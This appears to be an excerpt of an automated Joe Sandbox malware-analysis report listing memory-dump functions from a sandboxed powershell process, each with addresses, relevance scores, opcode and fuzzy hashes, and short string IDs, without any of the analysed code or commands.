                                                                                                        • Instruction ID: 923e085840451a386cc43fe49132c5b2d3701460c8f5632f77485687339d3c27
                                                                                                        • Opcode Fuzzy Hash: 554709524082ae40601b1fd283f5bb5ec0a17f989bf1a25d00dd5ff9f34d1f28
                                                                                                        • Instruction Fuzzy Hash: 39024A74A40228CFEB64DB24C954BEEB7B2AB84304F2081E6D9096F355DB75DE81CF91
                                                                                                        Function 06E362F3 Relevance: 2.9, Strings: 2, Instructions: 387COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: 628706d98997086919854c3ebc8d03044472023160d284de0ca19acdb826c841
                                                                                                        • Instruction ID: 3ee3bf10304ad69bf24528a334046732474bd6e528078e64758e3fb135763b7b
                                                                                                        • Opcode Fuzzy Hash: 628706d98997086919854c3ebc8d03044472023160d284de0ca19acdb826c841
                                                                                                        • Instruction Fuzzy Hash: 52F19070A00324AFEB64DB24C955FAAB7B2AF84304F20C0A5D50A6F795DB71DD82CF91
                                                                                                        Function 06E35538 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl$(fl
                                                                                                        • API String ID: 0-1194790885
                                                                                                        • Opcode ID: 4fec1657b31d6c86e0f3e5394ea63cc726eaf2a784bf4321a30982763d768917
                                                                                                        • Instruction ID: 69b06ee82a85d44abd51b00aa44115520cc1caf87a5641cc86c1652a9f7f2892
                                                                                                        • Opcode Fuzzy Hash: 4fec1657b31d6c86e0f3e5394ea63cc726eaf2a784bf4321a30982763d768917
                                                                                                        • Instruction Fuzzy Hash: 9391AB70B103149FEB54DB65C549BAEB7B2AF88718F209069E5066F390CB72EC41CB92
                                                                                                        Function 06E368C0 Relevance: 1.7, Strings: 1, Instructions: 443COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl
                                                                                                        • API String ID: 0-423539152
                                                                                                        • Opcode ID: 646b891cd4e91af7b901360cedfa56419182c79bf0ce7c484c751684fb525942
                                                                                                        • Instruction ID: d82ed06d493b7078a35d6e89042fe4423686613c2277147fcf845e279798fce2
                                                                                                        • Opcode Fuzzy Hash: 646b891cd4e91af7b901360cedfa56419182c79bf0ce7c484c751684fb525942
                                                                                                        • Instruction Fuzzy Hash: AA02AF74A003249FDB64DF64C849B9ABBB2AF85314F24C099E5096F355CB72ED82CF91
                                                                                                        Function 06E3B948 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl
                                                                                                        • API String ID: 0-423539152
                                                                                                        • Opcode ID: dfc4858d2956cd160932dcbcdf2bf2225ad8545db9a2c863cd1cfcdf7d4c85b6
                                                                                                        • Instruction ID: fedf9a875d9ae751559476e4fcd1b0c48358f44f1166c4ded9bdef1fac1fa86d
                                                                                                        • Opcode Fuzzy Hash: dfc4858d2956cd160932dcbcdf2bf2225ad8545db9a2c863cd1cfcdf7d4c85b6
                                                                                                        • Instruction Fuzzy Hash: 02E17270A403289FD764EB24C959BAEB7B2AF84304F2080D5D50A6F395DB75DE81CF91
                                                                                                        Function 06E3E49D Relevance: 1.5, Strings: 1, Instructions: 209COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (fl
                                                                                                        • API String ID: 0-423539152
                                                                                                        • Opcode ID: 38065fd833e2ff4db351a7ff0660893e93538050ebb43f35f3c75732c4bebf5a
                                                                                                        • Instruction ID: 822dfcbbd8d5646f6cacfc29080fc896abd54ccac53588d8f98faaa45d92a64a
                                                                                                        • Opcode Fuzzy Hash: 38065fd833e2ff4db351a7ff0660893e93538050ebb43f35f3c75732c4bebf5a
                                                                                                        • Instruction Fuzzy Hash: E9815D74A00324DFDB54CF54C588AA9BBB2AF88318F25906AE905AF355C732EC42CF50
                                                                                                        Function 06E3305C Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 84l
                                                                                                        • API String ID: 0-1480273888
                                                                                                        • Opcode ID: 4587815a2274cbd49b57accaf22680ceda0c202d65c5c7001133c8d0396559fc
                                                                                                        • Instruction ID: 22495514498718d6f880cdfd58d757554a741ef4866b4a62c0c75ea82b4bbdc6
                                                                                                        • Opcode Fuzzy Hash: 4587815a2274cbd49b57accaf22680ceda0c202d65c5c7001133c8d0396559fc
                                                                                                        • Instruction Fuzzy Hash: 8651F530A093D49FD7528B648819E66BFB1AF47204F19C0DBE584DF293D632CC4AC7A2
                                                                                                        Function 06E35C78 Relevance: .8, Instructions: 809COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: cf3c9f24bcd3b6a18d08362fe850b01a74ba4998c7b524a40a725b26344b025f
                                                                                                        • Instruction ID: 6e9fedc56e895b3de2ae846e5526bd0fd4478a411becc34080422fbead284a2f
                                                                                                        • Opcode Fuzzy Hash: cf3c9f24bcd3b6a18d08362fe850b01a74ba4998c7b524a40a725b26344b025f
                                                                                                        • Instruction Fuzzy Hash: 48626D74E003249FDB64DB64C959BAEB7B2AF85304F2080A9D5096F351CB72ED82CF91
                                                                                                        Function 06E3B225 Relevance: .7, Instructions: 704COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 8dcac6e947f1743a8e48d500f85bdbedb1055fddee77654d21c3b58c8b733f51
                                                                                                        • Instruction ID: 0f40096a87d0a3e70f5c554c2b1a52726e5473675803d330c00d443513b4c777
                                                                                                        • Opcode Fuzzy Hash: 8dcac6e947f1743a8e48d500f85bdbedb1055fddee77654d21c3b58c8b733f51
                                                                                                        • Instruction Fuzzy Hash: 62623B70A003289FDB64DB24C955BEEB7B2AB85304F2080E5D9096F395DB75EE81CF91
                                                                                                        Function 06E32890 Relevance: .5, Instructions: 501COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 46cdb0cac49aeaa776204314368b7a4f23d073b2cf6b779ea232afd533644d85
                                                                                                        • Instruction ID: 3775b13252fff666dfee656d3fd1a2bc1f73e0a14a8f13b72c466b1f8c53d865
                                                                                                        • Opcode Fuzzy Hash: 46cdb0cac49aeaa776204314368b7a4f23d073b2cf6b779ea232afd533644d85
                                                                                                        • Instruction Fuzzy Hash: 25F14B31B04325DFDBA58F35C8187AA7BB1AF81214F24C0ABD685DF252DB31CA45CBA1
                                                                                                        Function 06E30638 Relevance: .5, Instructions: 487COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: ffde24c426f7e71c3bdb169590b323d1a9857c61b9e8fa68d8bd4f31d913dd98
                                                                                                        • Instruction ID: e18f7598e85ca7fd88921ae1fe3b8046b3c86c8c0156af9fed4f9b035020ebcb
                                                                                                        • Opcode Fuzzy Hash: ffde24c426f7e71c3bdb169590b323d1a9857c61b9e8fa68d8bd4f31d913dd98
                                                                                                        • Instruction Fuzzy Hash: 4FF17A31B04365DFEB658B69980876BBBB6EFC2214F2480ABD445DB752DB31CC41CBA1
                                                                                                        Function 00C43670 Relevance: .3, Instructions: 309COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: dca07bd22e3cfc953380b70cbd15d82d0792b21316850a2fce009e927c10b201
                                                                                                        • Instruction ID: 2f63a9105f7fd76fb943733fd0f95600e514c397fcf5b6bb25bb35cc1bcdf0a2
                                                                                                        • Opcode Fuzzy Hash: dca07bd22e3cfc953380b70cbd15d82d0792b21316850a2fce009e927c10b201
                                                                                                        • Instruction Fuzzy Hash: DFD10774A01249EFDB05CFA8D484A9DFBB2FF89310F258159E855AB351C771EE82CB90
                                                                                                        Function 00C4E923 Relevance: .3, Instructions: 276COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 83bd4187a1e5149d82bfc02cf99173a4086e4de666d61f8b865a72bb63bd1957
                                                                                                        • Instruction ID: f68f838a023f991e0b9b93a165d6f2025497e73d975c4e6c29dee31c7e3cf388
                                                                                                        • Opcode Fuzzy Hash: 83bd4187a1e5149d82bfc02cf99173a4086e4de666d61f8b865a72bb63bd1957
                                                                                                        • Instruction Fuzzy Hash: 4CB14C70E00219CFDF10DFA9C8857EEBBF2BF48714F158129E825A7294EB749946CB91
                                                                                                        Function 00C48D38 Relevance: .3, Instructions: 266COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 404bbfb4acd5e5fe578971ba7a166e69fa87ad98f1c0361830621f224831ea25
                                                                                                        • Instruction ID: 0893808e6c92dd4199c084815760f4b49897dce31ad680b161587bb1c482bba7
                                                                                                        • Opcode Fuzzy Hash: 404bbfb4acd5e5fe578971ba7a166e69fa87ad98f1c0361830621f224831ea25
                                                                                                        • Instruction Fuzzy Hash: 59A16131A00219DFDB14DFE5D948A9EB7B2FF89310F118159E806AF365DB74AD49CB80
                                                                                                        Function 00C4F1EF Relevance: .3, Instructions: 261COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 099182901829e7708ecd35ec66b9322b3cb38683a6f6a6a88b81741eb0fdb09f
                                                                                                        • Instruction ID: b603c317ad89a34453769f51037a5b539b427ebd7facdf1107e2f4d457e6bd31
                                                                                                        • Opcode Fuzzy Hash: 099182901829e7708ecd35ec66b9322b3cb38683a6f6a6a88b81741eb0fdb09f
                                                                                                        • Instruction Fuzzy Hash: 43A14D70E002198FDB10DFA9D8817DEBBF1BF48714F24813DE825A7294EB749986CB91
                                                                                                        Function 00C48CAD Relevance: .2, Instructions: 245COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 982a5ea58a3b0aa41c3580c36114ea2cb5a3c5929b51dcf5a9bf14b14afe6210
                                                                                                        • Instruction ID: 7a6f2b82246f8ba70b71f78bfd8aab50d8549e3b7c6f0ce9f9fb302367d79426
                                                                                                        • Opcode Fuzzy Hash: 982a5ea58a3b0aa41c3580c36114ea2cb5a3c5929b51dcf5a9bf14b14afe6210
                                                                                                        • Instruction Fuzzy Hash: 4A814730E053849FCB12DBB4C85469EBFB2BF86300B15459AD441EF2A2DB749D8DCB91
                                                                                                        Function 00C48528 Relevance: .2, Instructions: 232COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 11a108ae213a54d70816e354f0e1575aea1e756b97020b8e69780f1f404b9a8e
                                                                                                        • Instruction ID: 11e68ec61709de0170152abd2cfce92c94652993181c85d8e525b142c3156c79
                                                                                                        • Opcode Fuzzy Hash: 11a108ae213a54d70816e354f0e1575aea1e756b97020b8e69780f1f404b9a8e
                                                                                                        • Instruction Fuzzy Hash: AB919230A01204DFCB25DF68D844AAEBBF2FF89310F158569E455AB361CB35ED89CB50
                                                                                                        Function 00C42EE7 Relevance: .2, Instructions: 213COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 707c88af06b1a1d9f5e40ac60f2580bebeb1a9c8e494336af759b9d5d7413c10
                                                                                                        • Instruction ID: fb8a959264d2a7b0cfef381f025c06fd746472f6821651596531fcb6b1d35b42
                                                                                                        • Opcode Fuzzy Hash: 707c88af06b1a1d9f5e40ac60f2580bebeb1a9c8e494336af759b9d5d7413c10
                                                                                                        • Instruction Fuzzy Hash: B5716FA190E3D19FDB039B7898746D97F71AF53210B0A41CBC0D58F2A3D1589949CBBA
                                                                                                        Function 00C49488 Relevance: .2, Instructions: 193COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 297130f201572d725b53affe8b969f19c7c778f44e723d104d5d9d5cc5098345
                                                                                                        • Instruction ID: 83616bb2069b3ce00cfb6cac765cb11c75b0324f181efc3bff46f19d22f0a5d8
                                                                                                        • Opcode Fuzzy Hash: 297130f201572d725b53affe8b969f19c7c778f44e723d104d5d9d5cc5098345
                                                                                                        • Instruction Fuzzy Hash: 8F718C30A00218DFDB14DF69C884AAEBBB6FF85314F24C56AD416EB650DB75AD46CB80
                                                                                                        Function 00C495F6 Relevance: .2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7ea2db3aa28daa487758cdc89db284fd51923f3eb72f455f9e95ab487842eb10
                                                                                                        • Instruction ID: 7a23633456d96dfeed1aa97c7dbf4af23519db223a7b4c53ed2dafecbbc1add8
                                                                                                        • Opcode Fuzzy Hash: 7ea2db3aa28daa487758cdc89db284fd51923f3eb72f455f9e95ab487842eb10
                                                                                                        • Instruction Fuzzy Hash: C3714D30A00218DFDF15DFA9D544BAEBBB2FF89304F248529E412AB790DB75AD45CB90
                                                                                                        Function 00C49473 Relevance: .1, Instructions: 148COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: a851c1916451f580700f8d1da23781c3e68e0fad95ff8cf3079eadafae3abac5
                                                                                                        • Instruction ID: 2592c929bef0cfa2d402ba2903f5ba09b31feec7d2f49b706a1f02a96ebc8957
                                                                                                        • Opcode Fuzzy Hash: a851c1916451f580700f8d1da23781c3e68e0fad95ff8cf3079eadafae3abac5
                                                                                                        • Instruction Fuzzy Hash: 0C515F71A00218DFDB14DFA5C848BAEBBB2FF89304F14852DD446AB790DB75AD45CB90
                                                                                                        Function 00C49219 Relevance: .1, Instructions: 119COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2f6516b70bb472e00d9f8c6fdbcaf10cf2b89d4a1920845552264146204960b
                                                                                                        • Instruction ID: f278194e21f2e2f0fb8115c0bb907216289f95611513852c25dcbae2f32fdbd8
                                                                                                        • Opcode Fuzzy Hash: b2f6516b70bb472e00d9f8c6fdbcaf10cf2b89d4a1920845552264146204960b
                                                                                                        • Instruction Fuzzy Hash: F3416931A00310DFDB189F65D958AAE7BB2FF89754F19846CE406EB7A0CB74AC41CB90
                                                                                                        Function 00C42C58 Relevance: .1, Instructions: 110COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3eb300dd330dbc7cf809f2ce2539928b6f6060e98614081c07450c25234a21b9
                                                                                                        • Instruction ID: fd1b9907ebb43300293d3d464e8843c14615e14291aac7f13ad6314aba7ed464
                                                                                                        • Opcode Fuzzy Hash: 3eb300dd330dbc7cf809f2ce2539928b6f6060e98614081c07450c25234a21b9
                                                                                                        • Instruction Fuzzy Hash: 27413674A006059FCB09CF99C494EEAFBB1FF48310B558259D915AB364C732ED91CFA4
                                                                                                        Function 06E3E130 Relevance: .1, Instructions: 103COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: e825dc611d48e78f24d2e464db1df9ed4e4772cd85520d5211cb66e15fc38325
                                                                                                        • Instruction ID: 8e7396c192f6ec987ae26b64e28c5586f5047b7e9b1b67ef20dfc87a721f1030
                                                                                                        • Opcode Fuzzy Hash: e825dc611d48e78f24d2e464db1df9ed4e4772cd85520d5211cb66e15fc38325
                                                                                                        • Instruction Fuzzy Hash: 84313630F053228FDBA45B3046183BA7AA19F82258F2440A7D801EB291EB39CD45C7E1
                                                                                                        Function 06E3707E Relevance: .1, Instructions: 102COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 258b8ada2dc506aba668eca491ac3b01432d578c7bd4857021bd7a1751ff2da0
                                                                                                        • Instruction ID: bb12ac3ef832521905338b7befa8acb8e1f23394ef5b8576a3b5ff8aaa08fee6
                                                                                                        • Opcode Fuzzy Hash: 258b8ada2dc506aba668eca491ac3b01432d578c7bd4857021bd7a1751ff2da0
                                                                                                        • Instruction Fuzzy Hash: 7331F270B403149BE754AB64C819BAF76B3AF85344F20C015EA027F391CFB6DC828B96
                                                                                                        Function 06E308C4 Relevance: .1, Instructions: 92COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9c204aac4575e18696ee66f3b9fcc4a912c8748b9edac1d07c15cd334c2b1607
                                                                                                        • Instruction ID: b6f4264ba6d5bba97b504eb3537b1335491bc76ad2483eca6e00b7751f0e404a
                                                                                                        • Opcode Fuzzy Hash: 9c204aac4575e18696ee66f3b9fcc4a912c8748b9edac1d07c15cd334c2b1607
                                                                                                        • Instruction Fuzzy Hash: 74313835A00329DFEB608F25C54D7B77BB9AFC0354F25906AE80897352C735D941CBA2
                                                                                                        Function 00C4BDC4 Relevance: .1, Instructions: 75COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 21c8c9abee5ff0fa4830d5378022da0f3ac825da48d7e3e34ffc681159333ee5
                                                                                                        • Instruction ID: 96822a5bd253fb39290eb584bc111b739ca9ac54512a98c681c31daacf889242
                                                                                                        • Opcode Fuzzy Hash: 21c8c9abee5ff0fa4830d5378022da0f3ac825da48d7e3e34ffc681159333ee5
                                                                                                        • Instruction Fuzzy Hash: F031FD30B012188BCB26AB34C8556EE76B6BF89348F1448E9D519AB351DF39DE85CF81
                                                                                                        Function 00C431C8 Relevance: .1, Instructions: 65COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 7bdc073278957675cd86e807613be43e6729c1a22ae8a4ed1867982b7bfc8316
                                                                                                        • Instruction ID: cd2eeefa59f5b78d7350029da5367ce7d33475cc17c3e25c1e87651ce02afe13
                                                                                                        • Opcode Fuzzy Hash: 7bdc073278957675cd86e807613be43e6729c1a22ae8a4ed1867982b7bfc8316
                                                                                                        • Instruction Fuzzy Hash: B5216FB4A042099FCB00CF98D480AAEBBB1FF89310B158196D819EB352C734ED41CBA1
                                                                                                        Function 00C431B9 Relevance: .1, Instructions: 56COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1668861808.0000000000C40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C40000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_c40000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 3c5c80153329f265009bbb144ce4426e536cbc3d9bf3d83b2417df428f4b7641
                                                                                                        • Instruction ID: 28aab976769f967aa1d1daa67b983149e922d7219735e18ef9081c329f8bbd9b
                                                                                                        • Opcode Fuzzy Hash: 3c5c80153329f265009bbb144ce4426e536cbc3d9bf3d83b2417df428f4b7641
                                                                                                        • Instruction Fuzzy Hash: 07210A74A042499FCB04DF98D480AAEFBB5FF89310B1485A9E919AB352C731FD51CFA1
                                                                                                        Function 06E32E74 Relevance: .0, Instructions: 30COMMON
                                                                                                        Download Yara Rule
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.1676301433.0000000006E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E30000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_6e30000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: fd9298fcf002fb544ad528e59f871c6a67bce2d00915774a497c067cae9329c2
                                                                                                        • Instruction ID: d749986e6c618adde58003ee561896ca3a81ba2365eae7d0eefc520c1d44375e
                                                                                                        • Opcode Fuzzy Hash: fd9298fcf002fb544ad528e59f871c6a67bce2d00915774a497c067cae9329c2
